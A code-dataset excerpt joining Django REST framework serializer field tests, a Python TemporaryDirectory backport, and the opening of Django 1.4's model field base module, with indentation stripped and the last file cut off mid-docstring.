self.assertEqual(e.messages, ["Date has wrong format. Use one of these formats instead: YYYY[-MM[-DD]]"])
else:
self.fail("ValidationError was not properly raised")
def test_to_native(self):
"""
Make sure to_native() returns datetime as default.
"""
f = serializers.DateField()
result_1 = f.to_native(datetime.date(1984, 7, 31))
self.assertEqual(datetime.date(1984, 7, 31), result_1)
def test_to_native_iso(self):
"""
Make sure to_native() with 'iso-8601' returns iso formated date.
"""
f = serializers.DateField(format='iso-8601')
result_1 = f.to_native(datetime.date(1984, 7, 31))
self.assertEqual('1984-07-31', result_1)
def test_to_native_custom_format(self):
"""
Make sure to_native() returns correct custom format.
"""
f = serializers.DateField(format="%Y - %m.%d")
result_1 = f.to_native(datetime.date(1984, 7, 31))
self.assertEqual('1984 - 07.31', result_1)
def test_to_native_none(self):
"""
Make sure from_native() returns None on None param.
"""
f = serializers.DateField(required=False)
self.assertEqual(None, f.to_native(None))
class DateTimeFieldTest(TestCase):
"""
Tests for the DateTimeField from_native() and to_native() behavior
"""
def test_from_native_string(self):
"""
Make sure from_native() accepts default iso input formats.
"""
f = serializers.DateTimeField()
result_1 = f.from_native('1984-07-31 04:31')
result_2 = f.from_native('1984-07-31 04:31:59')
result_3 = f.from_native('1984-07-31 04:31:59.000200')
self.assertEqual(datetime.datetime(1984, 7, 31, 4, 31), result_1)
self.assertEqual(datetime.datetime(1984, 7, 31, 4, 31, 59), result_2)
self.assertEqual(datetime.datetime(1984, 7, 31, 4, 31, 59, 200), result_3)
def test_from_native_datetime_datetime(self):
"""
Make sure from_native() accepts a datetime.datetime instance.
"""
f = serializers.DateTimeField()
result_1 = f.from_native(datetime.datetime(1984, 7, 31, 4, 31))
result_2 = f.from_native(datetime.datetime(1984, 7, 31, 4, 31, 59))
result_3 = f.from_native(datetime.datetime(1984, 7, 31, 4, 31, 59, 200))
self.assertEqual(result_1, datetime.datetime(1984, 7, 31, 4, 31))
self.assertEqual(result_2, datetime.datetime(1984, 7, 31, 4, 31, 59))
self.assertEqual(result_3, datetime.datetime(1984, 7, 31, 4, 31, 59, 200))
def test_from_native_custom_format(self):
"""
Make sure from_native() accepts custom input formats.
"""
f = serializers.DateTimeField(input_formats=['%Y -- %H:%M'])
result = f.from_native('1984 -- 04:59')
self.assertEqual(datetime.datetime(1984, 1, 1, 4, 59), result)
def test_from_native_invalid_default_on_custom_format(self):
"""
Make sure from_native() don't accept default formats if custom format is preset
"""
f = serializers.DateTimeField(input_formats=['%Y -- %H:%M'])
try:
f.from_native('1984-07-31 04:31:59')
except validators.ValidationError as e:
self.assertEqual(e.messages, ["Datetime has wrong format. Use one of these formats instead: YYYY -- hh:mm"])
else:
self.fail("ValidationError was not properly raised")
def test_from_native_empty(self):
"""
Make sure from_native() returns None on empty param.
"""
f = serializers.DateTimeField()
result = f.from_native('')
self.assertEqual(result, None)
def test_from_native_none(self):
"""
Make sure from_native() returns None on None param.
"""
f = serializers.DateTimeField()
result = f.from_native(None)
self.assertEqual(result, None)
def test_from_native_invalid_datetime(self):
"""
Make sure from_native() raises a ValidationError on passing an invalid datetime.
"""
f = serializers.DateTimeField()
try:
f.from_native('04:61:59')
except validators.ValidationError as e:
self.assertEqual(e.messages, ["Datetime has wrong format. Use one of these formats instead: "
"YYYY-MM-DDThh:mm[:ss[.uuuuuu]][+HHMM|-HHMM|Z]"])
else:
self.fail("ValidationError was not properly raised")
def test_from_native_invalid_format(self):
"""
Make sure from_native() raises a ValidationError on passing an invalid format.
"""
f = serializers.DateTimeField()
try:
f.from_native('04 -- 31')
except validators.ValidationError as e:
self.assertEqual(e.messages, ["Datetime has wrong format. Use one of these formats instead: "
"YYYY-MM-DDThh:mm[:ss[.uuuuuu]][+HHMM|-HHMM|Z]"])
else:
self.fail("ValidationError was not properly raised")
def test_to_native(self):
"""
Make sure to_native() returns isoformat as default.
"""
f = serializers.DateTimeField()
result_1 = f.to_native(datetime.datetime(1984, 7, 31))
result_2 = f.to_native(datetime.datetime(1984, 7, 31, 4, 31))
result_3 = f.to_native(datetime.datetime(1984, 7, 31, 4, 31, 59))
result_4 = f.to_native(datetime.datetime(1984, 7, 31, 4, 31, 59, 200))
self.assertEqual(datetime.datetime(1984, 7, 31), result_1)
self.assertEqual(datetime.datetime(1984, 7, 31, 4, 31), result_2)
self.assertEqual(datetime.datetime(1984, 7, 31, 4, 31, 59), result_3)
self.assertEqual(datetime.datetime(1984, 7, 31, 4, 31, 59, 200), result_4)
def test_to_native_iso(self):
"""
Make sure to_native() with format=iso-8601 returns iso formatted datetime.
"""
f = serializers.DateTimeField(format='iso-8601')
result_1 = f.to_native(datetime.datetime(1984, 7, 31))
result_2 = f.to_native(datetime.datetime(1984, 7, 31, 4, 31))
result_3 = f.to_native(datetime.datetime(1984, 7, 31, 4, 31, 59))
result_4 = f.to_native(datetime.datetime(1984, 7, 31, 4, 31, 59, 200))
self.assertEqual('1984-07-31T00:00:00', result_1)
self.assertEqual('1984-07-31T04:31:00', result_2)
self.assertEqual('1984-07-31T04:31:59', result_3)
self.assertEqual('1984-07-31T04:31:59.000200', result_4)
def test_to_native_custom_format(self):
"""
Make sure to_native() returns correct custom format.
"""
f = serializers.DateTimeField(format="%Y - %H:%M")
result_1 = f.to_native(datetime.datetime(1984, 7, 31))
result_2 = f.to_native(datetime.datetime(1984, 7, 31, 4, 31))
result_3 = f.to_native(datetime.datetime(1984, 7, 31, 4, 31, 59))
result_4 = f.to_native(datetime.datetime(1984, 7, 31, 4, 31, 59, 200))
self.assertEqual('1984 - 00:00', result_1)
self.assertEqual('1984 - 04:31', result_2)
self.assertEqual('1984 - 04:31', result_3)
self.assertEqual('1984 - 04:31', result_4)
def test_to_native_none(self):
"""
Make sure from_native() returns None on None param.
"""
f = serializers.DateTimeField(required=False)
self.assertEqual(None, f.to_native(None))
class TimeFieldTest(TestCase):
"""
Tests for the TimeField from_native() and to_native() behavior
"""
def test_from_native_string(self):
"""
Make sure from_native() accepts default iso input formats.
"""
f = serializers.TimeField()
result_1 = f.from_native('04:31')
result_2 = f.from_native('04:31:59')
result_3 = f.from_native('04:31:59.000200')
self.assertEqual(datetime.time(4, 31), result_1)
self.assertEqual(datetime.time(4, 31, 59), result_2)
self.assertEqual(datetime.time(4, 31, 59, 200), result_3)
def test_from_native_datetime_time(self):
"""
Make sure from_native() accepts a datetime.time instance.
"""
f = serializers.TimeField()
result_1 = f.from_native(datetime.time(4, 31))
result_2 = f.from_native(datetime.time(4, 31, 59))
result_3 = f.from_native(datetime.time(4, 31, 59, 200))
self.assertEqual(result_1, datetime.time(4, 31))
self.assertEqual(result_2, datetime.time(4, 31, 59))
self.assertEqual(result_3, datetime.time(4, 31, 59, 200))
def test_from_native_custom_format(self):
"""
Make sure from_native() accepts custom input formats.
"""
f = serializers.TimeField(input_formats=['%H -- %M'])
result = f.from_native('04 -- 31')
self.assertEqual(datetime.time(4, 31), result)
def test_from_native_invalid_default_on_custom_format(self):
"""
Make sure from_native() don't accept default formats if custom format is preset
"""
f = serializers.TimeField(input_formats=['%H -- %M'])
try:
f.from_native('04:31:59')
except validators.ValidationError as e:
self.assertEqual(e.messages, ["Time has wrong format. Use one of these formats instead: hh -- mm"])
else:
self.fail("ValidationError was not properly raised")
def test_from_native_empty(self):
"""
Make sure from_native() returns None on empty param.
"""
f = serializers.TimeField()
result = f.from_native('')
self.assertEqual(result, None)
def test_from_native_none(self):
"""
Make sure from_native() returns None on None param.
"""
f = serializers.TimeField()
result = f.from_native(None)
self.assertEqual(result, None)
def test_from_native_invalid_time(self):
"""
Make sure from_native() raises a ValidationError on passing an invalid time.
"""
f = serializers.TimeField()
try:
f.from_native('04:61:59')
except validators.ValidationError as e:
self.assertEqual(e.messages, ["Time has wrong format. Use one of these formats instead: "
"hh:mm[:ss[.uuuuuu]]"])
else:
self.fail("ValidationError was not properly raised")
def test_from_native_invalid_format(self):
"""
Make sure from_native() raises a ValidationError on passing an invalid format.
"""
f = serializers.TimeField()
try:
f.from_native('04 -- 31')
except validators.ValidationError as e:
self.assertEqual(e.messages, ["Time has wrong format. Use one of these formats instead: "
"hh:mm[:ss[.uuuuuu]]"])
else:
self.fail("ValidationError was not properly raised")
def test_to_native(self):
"""
Make sure to_native() returns time object as default.
"""
f = serializers.TimeField()
result_1 = f.to_native(datetime.time(4, 31))
result_2 = f.to_native(datetime.time(4, 31, 59))
result_3 = f.to_native(datetime.time(4, 31, 59, 200))
self.assertEqual(datetime.time(4, 31), result_1)
self.assertEqual(datetime.time(4, 31, 59), result_2)
self.assertEqual(datetime.time(4, 31, 59, 200), result_3)
def test_to_native_iso(self):
"""
Make sure to_native() with format='iso-8601' returns iso formatted time.
"""
f = serializers.TimeField(format='iso-8601')
result_1 = f.to_native(datetime.time(4, 31))
result_2 = f.to_native(datetime.time(4, 31, 59))
result_3 = f.to_native(datetime.time(4, 31, 59, 200))
self.assertEqual('04:31:00', result_1)
self.assertEqual('04:31:59', result_2)
self.assertEqual('04:31:59.000200', result_3)
def test_to_native_custom_format(self):
"""
Make sure to_native() returns correct custom format.
"""
f = serializers.TimeField(format="%H - %S [%f]")
result_1 = f.to_native(datetime.time(4, 31))
result_2 = f.to_native(datetime.time(4, 31, 59))
result_3 = f.to_native(datetime.time(4, 31, 59, 200))
self.assertEqual('04 - 00 [000000]', result_1)
self.assertEqual('04 - 59 [000000]', result_2)
self.assertEqual('04 - 59 [000200]', result_3)
class DecimalFieldTest(TestCase):
"""
Tests for the DecimalField from_native() and to_native() behavior
"""
def test_from_native_string(self):
"""
Make sure from_native() accepts string values
"""
f = serializers.DecimalField()
result_1 = f.from_native('9000')
result_2 = f.from_native('1.00000001')
self.assertEqual(Decimal('9000'), result_1)
self.assertEqual(Decimal('1.00000001'), result_2)
def test_from_native_invalid_string(self):
"""
Make sure from_native() raises ValidationError on passing invalid string
"""
f = serializers.DecimalField()
try:
f.from_native('123.45.6')
except validators.ValidationError as e:
self.assertEqual(e.messages, ["Enter a number."])
else:
self.fail("ValidationError was not properly raised")
def test_from_native_integer(self):
"""
Make sure from_native() accepts integer values
"""
f = serializers.DecimalField()
result = f.from_native(9000)
self.assertEqual(Decimal('9000'), result)
def test_from_native_float(self):
"""
Make sure from_native() accepts float values
"""
f = serializers.DecimalField()
result = f.from_native(1.00000001)
self.assertEqual(Decimal('1.00000001'), result)
def test_from_native_empty(self):
"""
Make sure from_native() returns None on empty param.
"""
f = serializers.DecimalField()
result = f.from_native('')
self.assertEqual(result, None)
def test_from_native_none(self):
"""
Make sure from_native() returns None on None param.
"""
f = serializers.DecimalField()
result = f.from_native(None)
self.assertEqual(result, None)
def test_to_native(self):
"""
Make sure to_native() returns Decimal as string.
"""
f = serializers.DecimalField()
result_1 = f.to_native(Decimal('9000'))
result_2 = f.to_native(Decimal('1.00000001'))
self.assertEqual(Decimal('9000'), result_1)
self.assertEqual(Decimal('1.00000001'), result_2)
def test_to_native_none(self):
"""
Make sure from_native() returns None on None param.
"""
f = serializers.DecimalField(required=False)
self.assertEqual(None, f.to_native(None))
def test_valid_serialization(self):
"""
Make sure the serializer works correctly
"""
class DecimalSerializer(serializers.Serializer):
decimal_field = serializers.DecimalField(max_value=9010,
min_value=9000,
max_digits=6,
decimal_places=2)
self.assertTrue(DecimalSerializer(data={'decimal_field': '9001'}).is_valid())
self.assertTrue(DecimalSerializer(data={'decimal_field': '9001.2'}).is_valid())
self.assertTrue(DecimalSerializer(data={'decimal_field': '9001.23'}).is_valid())
self.assertFalse(DecimalSerializer(data={'decimal_field': '8000'}).is_valid())
self.assertFalse(DecimalSerializer(data={'decimal_field': '9900'}).is_valid())
self.assertFalse(DecimalSerializer(data={'decimal_field': '9001.234'}).is_valid())
def test_raise_max_value(self):
"""
Make sure max_value violations raises ValidationError
"""
class DecimalSerializer(serializers.Serializer):
decimal_field = serializers.DecimalField(max_value=100)
s = DecimalSerializer(data={'decimal_field': '123'})
self.assertFalse(s.is_valid())
self.assertEqual(s.errors, {'decimal_field': ['Ensure this value is less than or equal to 100.']})
def test_raise_min_value(self):
"""
Make sure min_value violations raises ValidationError
"""
class DecimalSerializer(serializers.Serializer):
decimal_field = serializers.DecimalField(min_value=100)
s = DecimalSerializer(data={'decimal_field': '99'})
self.assertFalse(s.is_valid())
self.assertEqual(s.errors, {'decimal_field': ['Ensure this value is greater than or equal to 100.']})
def test_raise_max_digits(self):
"""
Make sure max_digits violations raises ValidationError
"""
class DecimalSerializer(serializers.Serializer):
decimal_field = serializers.DecimalField(max_digits=5)
s = DecimalSerializer(data={'decimal_field': '123.456'})
self.assertFalse(s.is_valid())
self.assertEqual(s.errors, {'decimal_field': ['Ensure that there are no more than 5 digits in total.']})
def test_raise_max_decimal_places(self):
"""
Make sure max_decimal_places violations raises ValidationError
"""
class DecimalSerializer(serializers.Serializer):
decimal_field = serializers.DecimalField(decimal_places=3)
s = DecimalSerializer(data={'decimal_field': '123.4567'})
self.assertFalse(s.is_valid())
self.assertEqual(s.errors, {'decimal_field': ['Ensure that there are no more than 3 decimal places.']})
def test_raise_max_whole_digits(self):
"""
Make sure max_whole_digits violations raises ValidationError
"""
class DecimalSerializer(serializers.Serializer):
decimal_field = serializers.DecimalField(max_digits=4, decimal_places=3)
s = DecimalSerializer(data={'decimal_field': '12345.6'})
self.assertFalse(s.is_valid())
self.assertEqual(s.errors, {'decimal_field': ['Ensure that there are no more than 4 digits in total.']})
class ChoiceFieldTests(TestCase):
"""
Tests for the ChoiceField options generator
"""
def test_choices_required(self):
"""
Make sure proper choices are rendered if field is required
"""
f = serializers.ChoiceField(required=True, choices=SAMPLE_CHOICES)
self.assertEqual(f.choices, SAMPLE_CHOICES)
def test_choices_not_required(self):
"""
Make sure proper choices (plus blank) are rendered if the field isn't required
"""
f = serializers.ChoiceField(required=False, choices=SAMPLE_CHOICES)
self.assertEqual(f.choices, models.fields.BLANK_CHOICE_DASH + SAMPLE_CHOICES)
def test_invalid_choice_model(self):
s = ChoiceFieldModelSerializer(data={'choice': 'wrong_value'})
self.assertFalse(s.is_valid())
self.assertEqual(s.errors, {'choice': ['Select a valid choice. wrong_value is not one of the available choices.']})
self.assertEqual(s.data['choice'], '')
def test_empty_choice_model(self):
"""
Test that the 'empty' value is correctly passed and used depending on
the 'null' property on the model field.
"""
s = ChoiceFieldModelSerializer(data={'choice': ''})
self.assertTrue(s.is_valid())
self.assertEqual(s.data['choice'], '')
s = ChoiceFieldModelWithNullSerializer(data={'choice': ''})
self.assertTrue(s.is_valid())
self.assertEqual(s.data['choice'], None)
def test_from_native_empty(self):
"""
Make sure from_native() returns an empty string on empty param by default.
"""
f = serializers.ChoiceField(choices=SAMPLE_CHOICES)
self.assertEqual(f.from_native(''), '')
self.assertEqual(f.from_native(None), '')
def test_from_native_empty_override(self):
"""
Make sure you can override from_native() behavior regarding empty values.
"""
f = serializers.ChoiceField(choices=SAMPLE_CHOICES, empty=None)
self.assertEqual(f.from_native(''), None)
self.assertEqual(f.from_native(None), None)
def test_metadata_choices(self):
"""
Make sure proper choices are included in the field's metadata.
"""
choices = [{'value': v, 'display_name': n} for v, n in SAMPLE_CHOICES]
f = serializers.ChoiceField(choices=SAMPLE_CHOICES)
self.assertEqual(f.metadata()['choices'], choices)
def test_metadata_choices_not_required(self):
"""
Make sure proper choices are included in the field's metadata.
"""
choices = [{'value': v, 'display_name': n}
for v, n in models.fields.BLANK_CHOICE_DASH + SAMPLE_CHOICES]
f = serializers.ChoiceField(required=False, choices=SAMPLE_CHOICES)
self.assertEqual(f.metadata()['choices'], choices)
class EmailFieldTests(TestCase):
"""
Tests for EmailField attribute values
"""
class EmailFieldModel(RESTFrameworkModel):
email_field = models.EmailField(blank=True)
class EmailFieldWithGivenMaxLengthModel(RESTFrameworkModel):
email_field = models.EmailField(max_length=150, blank=True)
def test_default_model_value(self):
class EmailFieldSerializer(serializers.ModelSerializer):
class Meta:
model = self.EmailFieldModel
serializer = EmailFieldSerializer(data={})
self.assertEqual(serializer.is_valid(), True)
self.assertEqual(getattr(serializer.fields['email_field'], 'max_length'), 75)
def test_given_model_value(self):
class EmailFieldSerializer(serializers.ModelSerializer):
class Meta:
model = self.EmailFieldWithGivenMaxLengthModel
serializer = EmailFieldSerializer(data={})
self.assertEqual(serializer.is_valid(), True)
self.assertEqual(getattr(serializer.fields['email_field'], 'max_length'), 150)
def test_given_serializer_value(self):
class EmailFieldSerializer(serializers.ModelSerializer):
email_field = serializers.EmailField(source='email_field', max_length=20, required=False)
class Meta:
model = self.EmailFieldModel
serializer = EmailFieldSerializer(data={})
self.assertEqual(serializer.is_valid(), True)
self.assertEqual(getattr(serializer.fields['email_field'], 'max_length'), 20)
class SlugFieldTests(TestCase):
"""
Tests for SlugField attribute values
"""
class SlugFieldModel(RESTFrameworkModel):
slug_field = models.SlugField(blank=True)
class SlugFieldWithGivenMaxLengthModel(RESTFrameworkModel):
slug_field = models.SlugField(max_length=84, blank=True)
def test_default_model_value(self):
class SlugFieldSerializer(serializers.ModelSerializer):
class Meta:
model = self.SlugFieldModel
serializer = SlugFieldSerializer(data={})
self.assertEqual(serializer.is_valid(), True)
self.assertEqual(getattr(serializer.fields['slug_field'], 'max_length'), 50)
def test_given_model_value(self):
class SlugFieldSerializer(serializers.ModelSerializer):
class Meta:
model = self.SlugFieldWithGivenMaxLengthModel
serializer = SlugFieldSerializer(data={})
self.assertEqual(serializer.is_valid(), True)
self.assertEqual(getattr(serializer.fields['slug_field'], 'max_length'), 84)
def test_given_serializer_value(self):
class SlugFieldSerializer(serializers.ModelSerializer):
slug_field = serializers.SlugField(source='slug_field',
max_length=20, required=False)
class Meta:
model = self.SlugFieldModel
serializer = SlugFieldSerializer(data={})
self.assertEqual(serializer.is_valid(), True)
self.assertEqual(getattr(serializer.fields['slug_field'],
'max_length'), 20)
def test_invalid_slug(self):
"""
Make sure an invalid slug raises ValidationError
"""
class SlugFieldSerializer(serializers.ModelSerializer):
slug_field = serializers.SlugField(source='slug_field', max_length=20, required=True)
class Meta:
model = self.SlugFieldModel
s = SlugFieldSerializer(data={'slug_field': 'a b'})
self.assertEqual(s.is_valid(), False)
self.assertEqual(s.errors, {'slug_field': ["Enter a valid 'slug' consisting of letters, numbers, underscores or hyphens."]})
class URLFieldTests(TestCase):
"""
Tests for URLField attribute values.
(Includes test for #1210, checking that validators can be overridden.)
"""
class URLFieldModel(RESTFrameworkModel):
url_field = models.URLField(blank=True)
class URLFieldWithGivenMaxLengthModel(RESTFrameworkModel):
url_field = models.URLField(max_length=128, blank=True)
def test_default_model_value(self):
class URLFieldSerializer(serializers.ModelSerializer):
class Meta:
model = self.URLFieldModel
serializer = URLFieldSerializer(data={})
self.assertEqual(serializer.is_valid(), True)
self.assertEqual(getattr(serializer.fields['url_field'],
'max_length'), 200)
def test_given_model_value(self):
class URLFieldSerializer(serializers.ModelSerializer):
class Meta:
model = self.URLFieldWithGivenMaxLengthModel
serializer = URLFieldSerializer(data={})
self.assertEqual(serializer.is_valid(), True)
self.assertEqual(getattr(serializer.fields['url_field'],
'max_length'), 128)
def test_given_serializer_value(self):
class URLFieldSerializer(serializers.ModelSerializer):
url_field = serializers.URLField(source='url_field',
max_length=20, required=False)
class Meta:
model = self.URLFieldWithGivenMaxLengthModel
serializer = URLFieldSerializer(data={})
self.assertEqual(serializer.is_valid(), True)
self.assertEqual(getattr(serializer.fields['url_field'],
'max_length'), 20)
def test_validators_can_be_overridden(self):
url_field = serializers.URLField(validators=[])
validators = url_field.validators
self.assertEqual([], validators, 'Passing `validators` kwarg should have overridden default validators')
class FieldMetadata(TestCase):
def setUp(self):
self.required_field = serializers.Field()
self.required_field.label = uuid4().hex
self.required_field.required = True
self.optional_field = serializers.Field()
self.optional_field.label = uuid4().hex
self.optional_field.required = False
def test_required(self):
self.assertEqual(self.required_field.metadata()['required'], True)
def test_optional(self):
self.assertEqual(self.optional_field.metadata()['required'], False)
def test_label(self):
for field in (self.required_field, self.optional_field):
self.assertEqual(field.metadata()['label'], field.label)
class FieldCallableDefault(TestCase):
def setUp(self):
self.simple_callable = lambda: 'foo bar'
def test_default_can_be_simple_callable(self):
"""
Ensure that the 'default' argument can also be a simple callable.
"""
field = serializers.WritableField(default=self.simple_callable)
into = {}
field.field_from_native({}, {}, 'field', into)
self.assertEqual(into, {'field': 'foo bar'})
class CustomIntegerField(TestCase):
"""
Test that custom fields apply min_value and max_value constraints
"""
def test_custom_fields_can_be_validated_for_value(self):
class MoneyField(models.PositiveIntegerField):
pass
class EntryModel(models.Model):
bank = MoneyField(validators=[validators.MaxValueValidator(100)])
class EntrySerializer(serializers.ModelSerializer):
class Meta:
model = EntryModel
entry = EntryModel(bank=1)
serializer = EntrySerializer(entry, data={"bank": 11})
self.assertTrue(serializer.is_valid())
serializer = EntrySerializer(entry, data={"bank": -1})
self.assertFalse(serializer.is_valid())
serializer = EntrySerializer(entry, data={"bank": 101})
self.assertFalse(serializer.is_valid())
class BooleanField(TestCase):
"""
Tests for BooleanField
"""
def test_boolean_required(self):
class BooleanRequiredSerializer(serializers.Serializer):
bool_field = serializers.BooleanField(required=True)
self.assertFalse(BooleanRequiredSerializer(data={}).is_valid())
| gpl-2.0 |
scitran/utilities | tempdir.py | 5 | 3074 | """This is a backport of TemporaryDirectory from Python 3.3."""
from __future__ import print_function
import warnings as _warnings
import sys as _sys
import os as _os
from tempfile import mkdtemp
template = "tmp"
class TemporaryDirectory(object):
"""Create and return a temporary directory. This has the same
behavior as mkdtemp but can be used as a context manager. For
example:
with TemporaryDirectory() as tmpdir:
...
Upon exiting the context, the directory and everything contained
in it are removed.
"""
def __init__(self, suffix="", prefix=template, dir=None):
self._closed = False
self.name = None # Handle mkdtemp raising an exception
self.name = mkdtemp(suffix, prefix, dir)
def __repr__(self):
return "<{} {!r}>".format(self.__class__.__name__, self.name)
def __enter__(self):
return self.name
def cleanup(self, _warn=False):
if self.name and not self._closed:
try:
self._rmtree(self.name)
except (TypeError, AttributeError) as ex:
# Issue #10188: Emit a warning on stderr
# if the directory could not be cleaned
# up due to missing globals
if "None" not in str(ex):
raise
print("ERROR: {!r} while cleaning up {!r}".format(ex, self,),
file=_sys.stderr)
return
self._closed = True
if _warn:
self._warn("Implicitly cleaning up {!r}".format(self),
ResourceWarning)
def __exit__(self, exc, value, tb):
self.cleanup()
def __del__(self):
# Issue a ResourceWarning if implicit cleanup needed
self.cleanup(_warn=True)
# XXX (ncoghlan): The following code attempts to make
# this class tolerant of the module nulling out process
# that happens during CPython interpreter shutdown
# Alas, it doesn't actually manage it. See issue #10188
_listdir = staticmethod(_os.listdir)
_path_join = staticmethod(_os.path.join)
_isdir = staticmethod(_os.path.isdir)
_islink = staticmethod(_os.path.islink)
_remove = staticmethod(_os.remove)
_rmdir = staticmethod(_os.rmdir)
_os_error = OSError
_warn = _warnings.warn
def _rmtree(self, path):
# Essentially a stripped down version of shutil.rmtree. We can't
# use globals because they may be None'ed out at shutdown.
for name in self._listdir(path):
fullname = self._path_join(path, name)
try:
isdir = self._isdir(fullname) and not self._islink(fullname)
except self._os_error:
isdir = False
if isdir:
self._rmtree(fullname)
else:
try:
self._remove(fullname)
except self._os_error:
pass
try:
self._rmdir(path)
except self._os_error:
pass
| mit |
ProfessionalIT/maxigenios-website | sdk/google_appengine/lib/django-1.4/django/db/models/fields/__init__.py | 12 | 47526 | import copy
import datetime
import decimal
import math
import warnings
from itertools import tee
from django.db import connection
from django.db.models.query_utils import QueryWrapper
from django.conf import settings
from django import forms
from django.core import exceptions, validators
from django.utils.datastructures import DictWrapper
from django.utils.dateparse import parse_date, parse_datetime, parse_time
from django.utils.functional import curry
from django.utils.text import capfirst
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from django.utils.encoding import smart_unicode, force_unicode, smart_str
from django.utils.ipv6 import clean_ipv6_address
class NOT_PROVIDED:
pass
# The values to use for "blank" in SelectFields. Will be appended to the start
# of most "choices" lists.
BLANK_CHOICE_DASH = [("", "---------")]
BLANK_CHOICE_NONE = [("", "None")]
class FieldDoesNotExist(Exception):
pass
# A guide to Field parameters:
#
# * name: The name of the field specifed in the model.
# * attname: The attribute to use on the model object. This is the same as
# "name", except in the case of ForeignKeys, where "_id" is
# appended.
# * db_column: The db_column specified in the model (or None).
# * column: The database column for this field. This is the same as
# "attname", except if db_column is specified.
#
# Code that introspects values, or does other dynamic things, should use
# attname. For example, this gets the primary key value of object "obj":
#
# getattr(obj, opts.pk.attname)
class Field(object):
"""Base class for all field types"""
# Designates whether empty strings fundamentally are allowed at the
# database level.
empty_strings_allowed = True
# These track each time a Field instance is created. Used to retain order.
# The auto_creation_counter is used for fields that Django implicitly
# creates, creation_counter is used for all user-specified fields.
creation_counter = 0
auto_creation_counter = -1
default_validators = [] # Default set of validators
default_error_messages = {
'invalid_choice': _(u'Value %r is not a valid choice.'),
'null': _(u'This field cannot be null.'),
'blank': _(u'This field cannot be blank.'),
'unique': _(u'%(model_name)s with this %(field_label)s '
u'already exists.'),
}
# Generic field type description, usually overriden by subclasses
def _description(self):
return _(u'Field of type: %(field_type)s') % {
'field_type': self.__class__.__name__
}
description = property(_description)
def __init__(self, verbose_name=None, name=None, primary_key=False,
max_length=None, unique=False, blank=False, null=False,
db_index=False, rel=None, default=NOT_PROVIDED, editable=True,
serialize=True, unique_for_date=None, unique_for_month=None,
unique_for_year=None, choices=None, help_text='', db_column=None,
db_tablespace=None, auto_created=False, validators=[],
error_messages=None):
self.name = name
self.verbose_name = verbose_name
self.primary_key = primary_key
self.max_length, self._unique = max_length, unique
self.blank, self.null = blank, null
# Oracle treats the empty string ('') as null, so coerce the null
# option whenever '' is a possible value.
if (self.empty_strings_allowed and
connection.features.interprets_empty_strings_as_nulls):
self.null = True
self.rel = rel
self.default = default
self.editable = editable
self.serialize = serialize
self.unique_for_date, self.unique_for_month = (unique_for_date,
unique_for_month)
self.unique_for_year = unique_for_year
self._choices = choices or []
self.help_text = help_text
self.db_column = db_column
self.db_tablespace = db_tablespace or settings.DEFAULT_INDEX_TABLESPACE
self.auto_created = auto_created
# Set db_index to True if the field has a relationship and doesn't
# explicitly set db_index.
self.db_index = db_index
# Adjust the appropriate creation counter, and save our local copy.
if auto_created:
self.creation_counter = Field.auto_creation_counter
Field.auto_creation_counter -= 1
else:
self.creation_counter = Field.creation_counter
Field.creation_counter += 1
self.validators = self.default_validators + validators
messages = {}
for c in reversed(self.__class__.__mro__):
messages.update(getattr(c, 'default_error_messages', {}))
messages.update(error_messages or {})
self.error_messages = messages
def __cmp__(self, other):
# This is needed because bisect does not take a comparison function.
return cmp(self.creation_counter, other.creation_counter)
def __deepcopy__(self, memodict):
# We don't have to deepcopy very much here, since most things are not
# intended to be altered after initial creation.
obj = copy.copy(self)
if self.rel:
obj.rel = copy.copy(self.rel)
memodict[id(self)] = obj
return obj
def to_python(self, value):
"""
Converts the input value into the expected Python data type, raising
django.core.exceptions.ValidationError if the data can't be converted.
Returns the converted value. Subclasses should override this.
"""
return value
def run_validators(self, value):
if value in validators.EMPTY_VALUES:
return
errors = []
for v in self.validators:
try:
v(value)
except exceptions.ValidationError, e:
if hasattr(e, 'code') and e.code in self.error_messages:
message = self.error_messages[e.code]
if e.params:
message = message % e.params
errors.append(message)
else:
errors.extend(e.messages)
if errors:
raise exceptions.ValidationError(errors)
def validate(self, value, model_instance):
"""
Validates value and throws ValidationError. Subclasses should override
this to provide validation logic.
"""
if not self.editable:
# Skip validation for non-editable fields.
return
if self._choices and value:
for option_key, option_value in self.choices:
if isinstance(option_value, (list, tuple)):
# This is an optgroup, so look inside the group for
# options.
for optgroup_key, optgroup_value in option_value:
if value == optgroup_key:
return
elif value == option_key:
return
msg = self.error_messages['invalid_choice'] % value
raise exceptions.ValidationError(msg)
if value is None and not self.null:
raise exceptions.ValidationError(self.error_messages['null'])
if not self.blank and value in validators.EMPTY_VALUES:
raise exceptions.ValidationError(self.error_messages['blank'])
def clean(self, value, model_instance):
"""
Convert the value's type and run validation. Validation errors
from to_python and validate are propagated. The correct value is
returned if no error is raised.
"""
value = self.to_python(value)
self.validate(value, model_instance)
self.run_validators(value)
return value
def db_type(self, connection):
"""
Returns the database column data type for this field, for the provided
connection.
"""
# The default implementation of this method looks at the
# backend-specific DATA_TYPES dictionary, looking up the field by its
# "internal type".
#
# A Field class can implement the get_internal_type() method to specify
# which *preexisting* Django Field class it's most similar to -- i.e.,
# a custom field might be represented by a TEXT column type, which is
# the same as the TextField Django field type, which means the custom
# field's get_internal_type() returns 'TextField'.
#
# But the limitation of the get_internal_type() / data_types approach
# is that it cannot handle database column types that aren't already
# mapped to one of the built-in Django field types. In this case, you
# can implement db_type() instead of get_internal_type() to specify
# exactly which wacky database column type you want to use.
data = DictWrapper(self.__dict__, connection.ops.quote_name, "qn_")
try:
return (connection.creation.data_types[self.get_internal_type()]
% data)
except KeyError:
return None
@property
def unique(self):
return self._unique or self.primary_key
def set_attributes_from_name(self, name):
if not self.name:
self.name = name
self.attname, self.column = self.get_attname_column()
if self.verbose_name is None and self.name:
self.verbose_name = self.name.replace('_', ' ')
def contribute_to_class(self, cls, name):
self.set_attributes_from_name(name)
self.model = cls
cls._meta.add_field(self)
if self.choices:
setattr(cls, 'get_%s_display' % self.name,
curry(cls._get_FIELD_display, field=self))
def get_attname(self):
return self.name
def get_attname_column(self):
attname = self.get_attname()
column = self.db_column or attname
return attname, column
def get_cache_name(self):
return '_%s_cache' % self.name
def get_internal_type(self):
return self.__class__.__name__
def pre_save(self, model_instance, add):
"""
Returns field's value just before saving.
"""
return getattr(model_instance, self.attname)
def get_prep_value(self, value):
"""
Perform preliminary non-db specific value checks and conversions.
"""
return value
def get_db_prep_value(self, value, connection, prepared=False):
"""Returns field's value prepared for interacting with the database
backend.
